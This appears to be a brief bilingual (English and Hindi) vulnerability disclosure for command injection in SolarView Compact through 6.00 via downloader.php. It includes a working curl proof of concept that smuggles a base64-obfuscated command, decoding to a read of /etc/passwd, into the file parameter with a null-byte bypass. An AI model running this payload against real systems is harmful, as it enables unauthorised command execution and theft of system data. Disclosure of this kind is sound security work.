
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
SolarView Compact 6.00 तक में एक कमांड इंजेक्शन भेद्यता है, हमलावर downloader.php के माध्यम से आंतरिक प्रतिबंधों को दरकिनार करके कमांड निष्पादित कर सकते हैं।
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
downloader.php पृष्ठ के file पैरामीटर तक पहुँचकर आंतरिक प्रतिबंधों को दरकिनार करके कमांड इंजेक्ट किए जा सकते हैं।
